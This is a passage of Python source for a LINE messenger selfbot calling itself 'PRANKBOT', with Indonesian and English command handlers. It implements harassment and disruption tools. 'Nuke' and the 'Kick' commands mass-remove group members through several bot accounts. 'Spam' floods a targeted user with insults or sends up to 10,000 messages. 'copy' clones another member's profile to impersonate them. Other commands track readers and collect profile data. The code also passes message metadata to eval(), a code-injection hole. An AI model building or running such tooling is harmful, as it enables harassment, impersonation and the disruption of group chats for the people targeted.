acil.sendText(msg.to," Dimatikan ✔")
elif "Clockname " in msg.text:
n = msg.text.replace("Jam say ","")
if len(n.decode("utf-8")) > 30:
acil.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
acil.sendText(msg.to,"Ini telah diubah✔\n\n" + n)
elif msg.text in ["Translate"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,translateMessage)
else:
acil.sendText(msg.to,helpt)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
acil.sendText(msg.to,"Diperbarui✔")
else:
acil.sendText(msg.to,"✨Silahkan Aktifkan Nama✨")
elif ("Fuck " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
acil.kickoutFromGroup(msg.to,[target])
except:
acil.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Kick2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("Kick3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
except:
ki3.sendText(msg.to,"Error")
elif ("Kick4 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
except:
ki4.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("Sc " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
key = acil.getContact(key1)
acil.sendText(msg.to,"" + key1)
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Succes Banned")
except:
pass
elif "Admin:add " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["ACIL"][target] = True
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"ADMIN DI TAMBAHKAN")
print "[Admin]DITAMBAHKAN"
except:
pass
elif "Admin:del @" in msg.text:
if msg.toType == 2:
print "[Admin]DIHAPUS"
_name = msg.text.replace("Admin:del @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["ACIL"][target]
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif msg.text in ["Listadmin","Adminlist"]:
if wait["ACIL"] == {}:
acil.sendText(msg.to,"No user is ADMIN")
else:
mc = " 🛡️==||ADMIN||==🛡️\n"
for mi_d in wait["ACIL"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif msg.text in ["Mygroups"]:
gid = acil.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⛓️] %s \n" % (acil.getGroup(i).name + " | 🗜️Members : " + str(len (acil.getGroup(i).members)))
acil.sendText(msg.to, "☆「Group List」☆\n"+ h +"🗜️Total Group : " +str(len(gid)))
#----------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = acil.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Locked")
except:
acil.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = acil.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
elif "Id " in msg.text:
msgg = msg.text.replace("Id ",'')
conn = acil.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
acil.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
acil.sendMessage(msg)
#_________________________________________________________________________
elif 'ig ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
acil.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
acil.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
acil.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
acil.sendImageWithURL(msg.to,path)
except:
pass
elif msg.text in ["Kalender","Time","Waktu"]:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nJam : [ " + timeNow.strftime('%H:%M:%S') + " ]"
acil.sendText(msg.to, rst)
#=======================================================================
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
acil.sendText(msg.to,van)
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = acil.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
acil.sendMessage(msg)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
acil.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif msg.text in ["Myname"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = acil.getContact(mid)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = acil.getContact(mid)
acil.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = acil.getContact(mid)
acil.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = acil.getContact(mid)
cu = acil.channel.getCover(mid)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = acil.getContact(mid)
cu = acil.channel.getCover(mid)
path = str(cu)
acil.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to, g.mid)
else:
pass
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
acil.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
acil.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
acil.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
acil.sendVideoWithURL(msg.to,wait["pap"])
#=========================
#-----------------------------------------------------------
elif msg.text == "Check":
acil.sendText(msg.to, "Check Yang nyimak")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif 'copy ' in msg.text.lower():
if msg.toType == 2:
red = re.compile(re.escape('copy '),re.IGNORECASE)
tname = red.sub('',msg.text)
tname = tname.lstrip()
tname = tname.replace(" @","$spliter$")
tname = tname.rstrip()
tname = tname.split("$spliter$")
tname = tname[0]
tname = tname[1:]
clist = {
"Founded":False,
"displayName":"",
"statusMessage":"",
"pictureStatus":""
}
mems = acil.getGroup(msg.to).members
for targ in mems:
if targ.displayName == tname:
clist["displayName"] = targ.displayName
clist["statusMessage"] = targ.statusMessage
clist["pictureStatus"] = targ.pictureStatus
clist["Founded"] = True
if clist["Founded"]:
wait["selfStatus"] = False
me = acil.getProfile()
me.displayName = clist["displayName"]
me.statusMessage = clist["statusMessage"]
me.pictureStatus = clist["pictureStatus"]
acil.updateDisplayPicture(me.pictureStatus)
acil.updateProfile(me)
acil.sendText(msg.to,"Done")
else:
acil.sendText(msg.to,"Done")
elif "Urlpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Urlpict @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Urlcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Urlcover @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
acil.sendText(msg.to,"Tidak Ada kontak blacklist")
else:
acil.sendText(msg.to,"═════════List Blacklist════════")
h = ""
for i in wait["blacklist"]:
h = acil.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
acil.sendMessage(M)
#-------------------------------------------------
elif "Spam @" in msg.text:
# if msg.from_ in admin:
_name = msg.text.replace("Spam @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
acil.sendText(msg.to,"Wating in progres...")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
ki.sendText(g.mid,"LO")
ki2.sendText(g.mid,"TUH")
ki3.sendText(g.mid,"BAU")
ki4.sendText(g.mid,"TAI")
ki5.sendText(g.mid,"~WE ARE PRANKBOT BLACK OF GAMER~")
acil.sendText(msg.to, "Succes...!!!!")
print " Spammed !"
#--------------------------------------------------------------------------
#-----------------------------------------------------------
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
acil.sendText(msg.to,"Target Lock")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
ki.sendText(msg.to, text)
else:
acil.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 10000:
ki.sendText(msg.to, tulisan)
else:
acil.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
acil.sendText(msg.to,"Target ditambahkan!")
break
except:
acil.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
acil.sendText(msg.to,"Target dihapuskan!")
break
except:
acil.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
acil.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
acil.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
acil.sendText(msg.to,"Mimic change to target")
else:
acil.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
acil.sendText(msg.to,"Reply Message on")
else:
acil.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
acil.sendText(msg.to,"Reply Message off")
else:
acil.sendText(msg.to,"Sudah off")
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = acil.getGroup(msg.to)
acil.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = acil.getGroup(msg.to)
acil.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["Friendlist"]:
contactlist = acil.getAllContactIds()
kontak = acil.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = acil.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
acil.sendText(msg.to, msgs)
elif msg.text in ["Friendlistmid"]:
gruplist = acil.getAllContactIds()
kontak = acil.getContacts(gruplist)
num=1
msgs="═════════List FriendMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════List FriendMid═════════\n\nTotal Friend : %i" % len(kontak)
acil.sendText(msg.to, msgs)
#-----------------------------------------------
elif "lurk:on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
acil.sendText(msg.to,"Lurking already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
acil.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk:off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
acil.sendText(msg.to,"Lurking already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
acil.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
acil.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = acil.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
acil.sendMessage(msg)
except Exception as error:
print error
pass
else:
acil.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["Bl:on"]:
wait["wblacklist"] = True
acil.sendText(msg.to,"Send Contact")
elif msg.text in ["Unbl:on"]:
wait["dblacklist"] = True
acil.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'mcheck':
if wait["blacklist"] == {}:
acil.sendText(msg.to," Nothing in the blacklist")
else:
acil.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
acil.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = " 🛡️====||B L A C K L I S T||====🛡️\n"
for mi_d in wait["blacklist"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
print "[Command]Banlist executed"
elif msg.text in ["Clearban"]:
if msg.toType == 2:
wait["blacklist"] = {}
acil.sendText(msg.to,"clear all blacklist")
ki.sendText(msg.to,"done ✔")
ki2.sendText(msg.to,"done ✔")
ki3.sendText(msg.to,"done ✔")
ki4.sendText(msg.to,"done ✔")
ki5.sendText(msg.to,"done ✔")
ki.sendText(msg.to,"blacklist done all removed 👮")
elif msg.text.lower() == 'kick@mbl':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
acil.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#-----------------------------------------------
#---------------------------------------------------
elif "Pict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Pict @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#---------------------------------------------------
#---------------------------------------------------
elif msg.text in ["Recopy"]:
try:
acil.updateDisplayPicture(mybackup.pictureStatus)
acil.updateProfile(mybackup)
acil.sendText(msg.to, "Success")
except Exception as e:
acil.sendText(msg.to, str (e))
#-----------------------------------------------------------------------
elif "Youtube " in msg.text:
try:
textToSearch = (msg.text).replace("Youtube ", "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
acil.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
acil.sendText(msg.to,"Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtubesearch ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
acil.sendText(msg.to,hasil)
print '[Command] Youtube Search'
#------------------------------------------------
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n~Header\n" + str(cu))
except:
acil.sendText(msg.to,"~Nama\n" + contact.displayName + "\n~Mid\n" + contact.mid + "\n~Bio\n" + contact.statusMessage + "\n~Profile Picture\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
try:
acil.sendText(msg.to,contact.statusMessage)
except:
acil.sendText(msg.to,contact.statusMessage)
elif "Gimage" in msg.text:
group = acil.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
acil.sendImageWithURL(msg.to,path)
elif "Getprofile @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getprofile @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------
elif msg.text in ["Invite"]:
wait["invite"] = True
random.choice(KAC).sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif msg.text.lower() == 'reboot':
print "[Command]Like executed"
try:
acil.sendText(msg.to,"Restarting...")
restart_program()
except:
acil.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Hay " in msg.text:
say = msg.text.replace("Hay ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
acil.sendAudio(msg.to,"hasil.mp3")
elif "Nuke" in msg.text:
if msg.toType == 2:
print "Nuke ok"
_name = msg.text.replace("Nuke","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Limit gw njir..")
else:
for target in targets:
if not target in Bots:
if not target in PRANKBOT + wait["ACIL"]:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
elif msg.text in ["Tag","Tagall","Mencret"]:
group = acil.getGroup(msg.to)
k = len(group.members)//500
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*500 : (j+1)*500]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
